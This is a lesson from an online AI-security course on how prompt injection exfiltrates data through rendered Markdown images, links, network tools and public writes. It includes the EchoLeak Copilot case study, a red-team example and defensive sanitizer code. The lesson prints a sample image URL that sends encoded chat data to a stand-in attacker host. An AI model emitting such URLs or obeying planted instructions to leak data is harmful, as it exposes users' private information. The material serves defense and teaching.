AI Security: Prompt Injection, Data Leakage and Red TeamingPrompt injection, jailbreaks and data exfiltration · Lesson 7 of 17

Data exfiltration: images, links, tools and EchoLeak

Article · 14 min · 8 min lecture

Video lecture

Data exfiltration: images, links, tools and EchoLeak

14 chapters · about 8 min · full transcript

Coming soon

Chapter 1 of 14

Data exfiltration channels

  • Images, links, tools, public writes
  • Case study: EchoLeak
  • Output sanitizing + CSP

The narrated lecture is in production

Every chapter is scripted and ready. Browse the chapters and read the full transcript now — the video will appear here when it’s published.

Chapters

Injection is the entry; exfiltration is the payoff

Most serious prompt-injection attacks aim to move data from where it should be to where the attacker can read it. Understanding exfiltration channels lets you close them even when you cannot stop injection itself. This is the "external communication" leg of the lethal trifecta.

Channel 1: rendered Markdown images

Many chat interfaces render Markdown. If the model outputs:

![loading](https://attacker.example/pixel.png?d=SGVsbG8gZnJvbSB0aGUgY2hhdA)

the user's browser fetches that URL automatically, sending the query string (here, encoded data from the conversation) to the attacker's server. No click needed. Researchers have repeatedly demonstrated this pattern against major assistants, and vendors have responded with image proxies and URL restrictions.

Defenses: do not auto-render images from arbitrary domains; proxy or allowlist image hosts; set a strict Content Security Policy (img-src limited to your domains); strip or neutralize Markdown images in model output unless needed.

A link with data in its URL requires a click, but social engineering ("click here to verify your account") makes clicks likely. Reference-style Markdown links can evade naive filters.

Defenses: allowlist link domains in output; show full destination URLs; warn on external links; strip query strings from untrusted links.

Channel 3: tools that reach the network

Any tool that makes outbound requests can exfiltrate: web fetch, HTTP request, webhook, email send, calendar invite, file share, even DNS lookups through tools that resolve hostnames.

Defenses: egress allowlists at the network layer (not just in the prompt); remove generic "fetch any URL" tools from agents that handle private data; restrict email recipients; require approval for outbound actions carrying data.

Channel 4: writing to places others can read

Posting comments, creating public issues, updating shared documents, or writing to a public bucket can leak data indirectly.

Defenses: least privilege on write scopes; human approval for publishing; data-classification checks on outbound content.

Case study: EchoLeak

In June 2025, researchers at Aim Security disclosed EchoLeak (CVE-2025-32711), a zero-click vulnerability in Microsoft 365 Copilot. A single crafted email could cause Copilot, when later answering a user's question, to pull sensitive internal content into its response and exfiltrate it. Reported techniques included evading the cross-prompt-injection classifier, bypassing link redaction with reference-style Markdown, abusing auto-fetched images, and routing through an allowed Microsoft domain to satisfy the Content Security Policy. Microsoft fixed it server-side. The lesson for builders: each individual defense was bypassed; only the chain mattered. Defense in depth and closing channels at the architecture level are what hold up.

Channel checklist for your app

ChannelPresent?Control
Markdown image renderingCSP img-src allowlist / image proxy / strip
Clickable linksDomain allowlist, visible URLs
Web fetch / HTTP toolsRemove or egress allowlist
Email / messaging sendRecipient allowlist, approval
Public writes (issues, docs, posts)Approval, classification checks
File sharing / uploadsScoped destinations
Logs and telemetry to third partiesRedaction, DPA

Hands-on: sanitize model output before rendering

import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.souqstyle.example", "cdn.souqstyle.example"}
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"\[([^\]]+)\]\(([^)\s]+)[^)]*\)")
REF_DEF = re.compile(r"^\s*\[[^\]]+\]:\s*\S+.*$", re.M)   # reference-style link definitions

def allowed(url: str) -> bool:
    try:
        u = urlparse(url)
        return u.scheme == "https" and u.hostname in ALLOWED_HOSTS
    except ValueError:
        return False

def sanitize(md: str) -> str:
    md = REF_DEF.sub("", md)                                             # drop reference definitions
    md = MD_IMAGE.sub(lambda m: m.group(0) if allowed(m.group(2)) else f"[image removed: {m.group(1)}]", md)
    md = MD_LINK.sub(lambda m: m.group(0) if allowed(m.group(2)) else f"{m.group(1)} (external link removed)", md)
    return md

Pair with a CSP header on the page that renders chat:

Content-Security-Policy: default-src 'self'; img-src 'self' https://cdn.souqstyle.example; connect-src 'self'

Sanitizing output is a backstop; the CSP enforces it in the browser even if sanitization misses a case.

Worked example

A Dubai real-estate CRM added an assistant that could read lead records and browse listing pages. A red-team test planted instructions on a public listing page; the assistant embedded a lead's phone number in an image URL. Fixes: images restricted to the company CDN via CSP, output sanitization, and splitting the assistant so the browsing component had no access to lead records.

Pitfalls

  • Filtering only obvious image syntax (reference-style Markdown and HTML bypass naive regexes).
  • Prompt-based "never include URLs" instead of enforcement.
  • Generic fetch tools on agents with private data.
  • Forgetting telemetry as an outbound channel.

How to measure success

Every exfiltration channel is listed with an enforced control, CSP is in place wherever model output renders, and red-team exfiltration tests fail to deliver data to external hosts.

Key takeaways

  • Exfiltration is the payoff of injection; closing channels protects data even when injection succeeds.
  • Channels: auto-rendered Markdown images, links, network-capable tools, public writes and telemetry.
  • EchoLeak (CVE-2025-32711) chained several bypasses; only architecture-level defense in depth holds.
  • Sanitize output, enforce CSP, use egress allowlists and separate untrusted browsing from private data.

Check your understanding

Quick questions to lock in the lesson. They don’t count towards your certificate.

  1. Why is a Markdown image in model output a zero-click exfiltration channel?
  2. What is the main lesson from EchoLeak for builders?

Put it into practice

Complete the channel checklist for your app and deploy the output sanitizer plus a CSP header wherever model output renders.

Enrol for free to save your progress

Reading is always free. Enrol to keep your place, take the final assessment and earn a verifiable certificate.